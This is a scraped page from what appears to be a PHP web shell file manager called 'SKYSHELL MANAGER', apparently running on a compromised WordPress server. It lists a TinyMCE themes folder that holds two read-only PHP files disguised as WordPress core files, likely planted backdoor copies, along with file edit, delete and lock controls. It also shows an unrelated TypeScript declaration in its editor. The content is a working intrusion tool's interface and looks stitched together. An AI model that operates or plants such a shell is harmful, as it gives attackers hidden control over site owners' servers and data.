📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: Type.d.ts
// prettier-ignore declare function Type<T>(x: T): T extends string ? 'String' : T extends number ? 'Number' : T extends boolean ? 'Boolean' : T extends symbol ? 'Symbol' : T extends null ? 'Null' : T extends undefined ? 'Undefined' : T extends object ? 'Object' : 'String' | 'Number' | 'Boolean' | 'Symbol' | 'Null' | 'Undefined' | 'Object' | undefined; export = Type;
Save